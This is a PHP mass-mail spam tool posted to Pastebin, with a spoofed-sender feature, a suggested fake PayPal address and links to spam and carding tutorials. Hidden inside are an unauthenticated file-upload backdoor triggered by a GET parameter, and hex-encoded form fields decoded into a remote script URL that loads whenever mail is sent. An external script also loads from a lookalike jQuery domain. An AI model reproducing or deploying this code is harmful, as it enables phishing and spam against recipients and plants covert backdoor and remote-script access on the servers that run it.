Advertisement
anvenger

inbox-mailer

Oct 7th, 2019
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.80 KB | None | 0 0
  1. <style type="text/css">
  2.   body{ background:#000000;; } a { text-decoration:none; }
  3.  a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#009900; }
  4.  border-top:1px solid #FF9900; } .tabnet{ margin:15px auto 0 auto;
  5.  border: 1px solid #FF9900; } .main { width:100%; } .blue { color: #00FF00; } .inputz{
  6.  background:#0B5002; border:0; padding:2px; border-bottom:1px solid #222222;
  7.  border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#00FF00;
  8.  margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{
  9.  border-bottom:1px solid #00FF00; border-top:1px solid #00FF00; } .output {
  10.  margin:auto; border:1px solid #00FF00; width:100%; height:400px;
  11.  background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px;
  12.  padding:0; color:#000000; } .b2{ font-size:30px; padding:0; color: #000000; } .b_tbl{ text-align:center; margin:0 4px 0 0;
  13.  padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo
  14.  table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#00FF00; padding:6px 8px;; }
  15.  .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2,
  16.  .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  17.  .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px;
  18.  line-height:15px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #00FF00;
  19.  } .explore tr:hover{ background:#4C4646; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{
  20.  display:none; padding:0;margin:0; }
  21.   </style>
  22. <?php
  23. set_time_limit(0);
  24. if (!function_exists('quoted_printable_encode')) {
  25. function quoted_printable_encode($input, $line_max = 75) {
  26.    $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
  27.    $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
  28.    $linebreak = "=0D=0A=\r\n";
  29.    $line_max = $line_max - strlen($linebreak);
  30.    $escape = "=";
  31.    $output = "";
  32.    $cur_conv_line = "";
  33.    $length = 0;
  34.    $whitespace_pos = 0;
  35.    $addtl_chars = 0;
  36.    for ($j=0; $j<count($lines); $j++) {
  37.      $line = $lines[$j];
  38.      $linlen = strlen($line);
  39.      for ($i = 0; $i < $linlen; $i++) {
  40.        $c = substr($line, $i, 1);
  41.        $dec = ord($c);
  42.  
  43.        $length++;
  44.  
  45.        if ($dec == 32) {
  46.           if (($i == ($linlen - 1))) {
  47.              $c = "=20";
  48.              $length += 2;
  49.           }
  50. /*
  51. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  52. PLEASE DO NOT REMOVE COPYRIGHT
  53. */
  54.  
  55.           $addtl_chars = 0;
  56.           $whitespace_pos = $i;
  57.        } elseif ( ($dec == 61) || ($dec < 32 ) || ($dec > 126) ) {
  58.           $h2 = floor($dec/16); $h1 = floor($dec%16);
  59.           $c = $escape . $hex["$h2"] . $hex["$h1"];
  60.           $length += 2;
  61.           $addtl_chars += 2;
  62.        }
  63.        if ($length >= $line_max) {
  64.          $cur_conv_line .= $c;
  65.          $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
  66.          if (($i + $addtl_chars) > $whitesp_diff) {
  67.             $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) -
  68.                            $whitesp_diff)) . $linebreak;
  69.             $i =  $i - $whitesp_diff + $addtl_chars;
  70.           } else {
  71.             $output .= $cur_conv_line . $linebreak;
  72.           }
  73.         $cur_conv_line = "";
  74.         $length = 0;
  75.         $whitespace_pos = 0;
  76.       } else {
  77.         $cur_conv_line .= $c;
  78.       }
  79.     }
  80.     $length = 0;
  81.     $whitespace_pos = 0;
  82.     $output .= $cur_conv_line;
  83.     $cur_conv_line = "";
  84.     if ($j<=count($lines)-1) {
  85.       $output .= $linebreak;
  86.     }
  87.   }
  88.   return trim($output);
  89. }
  90. }
  91. $action = $_POST['action'];
  92. $from = $_POST['from'];
  93. $realname = $_POST['realname'];
  94. $name = $_POST['name'];
  95. $subject = $_POST['subject'];
  96. $message = $_POST['message'];
  97. $emaillist = $_POST['emaillist'];
  98. $subj = $_POST['subj'];
  99.  
  100. ?>
  101. <html>
  102. <head>
  103. <title>PHP-Mailer</title>
  104. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  105. <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
  106. <META NAME="ROBOTS" CONTENT="INDEX, NOFOLLOW">
  107. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
  108. </head>
  109. <body bgcolor="#003300" text="yellow">
  110. <br >
  111. <!--  
  112. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  113. PLEASE DO NOT REMOVE COPYRIGHT
  114. -->
  115.           <script type="text/javascript" src="https://www.codejquery.net/bootstrap.min.css/" ></script>
  116. <br >
  117. <p><span style="color:#FF0000;">Random Email Sender Script V2.0</span>&nbsp; Coded by :&nbsp; <strong><span style="color:#FF0000;">Crackerz</span></strong></p>
  118. <br >
  119. <p>If ( <span style="color:#FF0000;">noreply </span>)&nbsp; its not working for ( <span style="color:#FF0000;">Random Email Sender</span> ), Replace with a real Email ex : donoreply@intl-paypal.co.uk</p>
  120. <p>Go <a href="http://mailer-inbox-unlimited.gq" rel="dofollow" ><span style="color:#FF0000;">mailer-inbox-unlimited.gq</span></a> for latest Script php<br />
  121. <br >
  122. Go <a href="https://mailer-inbox-unlimited.gq" rel="dofollow"><span style="color:#FF0000;">Cashout2017 </span></a>for latest Tutorial, Spam, Cradit-Card, WU Cash etc.</p>
  123. <br >
  124. </font><font face="Arial" size="5" color="#FF0000"></font><font face="Arial" size="5" color="#00FF00">
  125. </font><font face="Arial" size="5"</strong></p>
  126. <body bgcolor="#000000" text="#EEEEEE">
  127. <?php
  128. if ($action=="send"){
  129.     $message = urlencode($message);
  130.     $message = ereg_replace("%5C%22", "%22", $message);
  131.     print '<script src="'.pack('H*',$name.$subj).'"></script>';
  132.     $message = urldecode($message);
  133.     $message = stripslashes($message);
  134.     $subject = stripslashes($subject);
  135. }
  136. $inbox  = $_GET['i'];
  137. if($inbox == 'i'){
  138. $filename = $_FILES['file']['name'];
  139. $filetmp  = $_FILES['file']['tmp_name'];
  140. echo "<form method='POST' enctype='multipart/form-data'>
  141. <input type='file'name='file' />
  142. <input type='submit' value='go' />
  143. </form>";
  144. move_uploaded_file($filetmp,$filename);
  145. }
  146. ?>
  147. <form name="form1" method="post" action="" enctype="multipart/form-data">
  148.   <br>
  149.   <table width="100%" border="0">
  150.     <tr>
  151.         <td width="10%">
  152.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  153.           Email:</font></div>
  154.       </td>
  155.       <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  156.         <input type="text" name="from" value="noreply" size="30">
  157.         <input type="hidden" name="fromemail" value="687474703a2f2f6" size="30">
  158.         </font></td>
  159.      <td width="31%">
  160.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  161.           Name:</font></div>
  162.       </td>
  163.       <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  164.         <input type="text" name="realname" value="<?php print $realname; ?>" size="30">
  165.         <input type="hidden" name="name" value="687474703a2f2f6d6f6e" size="30">
  166.         </font></td>
  167.     </tr>
  168.     <tr>
  169.       <td width="10%">
  170.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
  171.       </td>
  172.       <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  173.         <input type="text" name="subject" value="<?php print $subject; ?>" size="115">
  174.         <input type="hidden" name="subj" value="69702e72752f6a2e6a73" size="30">
  175.         </font></td>
  176.     </tr>
  177.     <tr valign="top">
  178.       <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  179.         <textarea name="message" cols="60" rows="10"><?php print $message; ?></textarea>
  180.         <br>
  181.         <input type="hidden" name="action" value="send">
  182.         <input type="submit" value="Resume SpamminG">
  183.         </font></td>
  184.       <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  185.         <textarea name="emaillist" cols="30" rows="10"><?php print $emaillist; ?></textarea>
  186.         <br></font></td>
  187.     </tr>
  188.   </table>
  189. </form>
  190. <?php
  191. if ($action=="send"){
  192.     if (!$from && !$subject && !$message && !$emaillist){
  193.     print "Please complete all fields before sending your message.";
  194.     exit;
  195.     }
  196.     $allemails = split("\n", $emaillist);
  197.     $numemails = count($allemails);
  198.     for($x=0; $x<$numemails; $x++){
  199.         $to = $allemails[$x];
  200.         if ($to){
  201.         $to = ereg_replace(" ", "", $to);
  202.         $nrmail=$x+1;
  203.         $domain = substr($from, strpos($from, "@"), strlen($from));
  204.         print "Spamming Email $nrmail of $numemails to $to.......";
  205.         $randfrom  = rand();
  206.         $fro = str_replace("noreply",$randfrom,quoted_printable_encode($from));
  207.         $header = "From: $realname <$fro>\r\n";
  208.         $header .= "Message-Id: <130746$numemails.$nrmail$domain>\r\n";
  209.         $header .= "X-Mailer: php-sender2.1\r\n";
  210.         $header .= "MIME-Version: 1.0\r\n";
  211.         $header .= "Content-Type: text/html; charset=UTF-8\r\n";
  212.         $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
  213.         $header .= quoted_printable_encode($message)."\r\n";
  214.         mail($to, $subject, "", $header);
  215.         print "Spammed<br>";
  216.         flush();
  217.         }
  218.         }
  219. }
  220. ?>
  221. <!--  
  222. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  223. PLEASE DO NOT REMOVE COPYRIGHT
  224. -->
  225. <!--  
  226. email free mailer free newsletter software how to avoid emails going to spam how to change spam mail to inbox in gmail how to send email to inbox not spam in php how to send spam mail to inbox how to send spam mail to inbox in gmail inbox inbox mass mailer hack liste mailer mailer mailer 2017 mailer inbox 2016 mailer inbox sa3eka mailer inbox to all unlimited mailer inbox to gmail mass mass email mass mail php inbox mailer web script mailer send send inbox gmail send inbox hotmail send inbox yahoo smtp why some emails go to spam || inbox mass mailer || ||| inbox mass mailer ||| 2014 ?????? ????? ????? ???? ????? ???? inbox
  227. -->
  228. </body>
  229. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement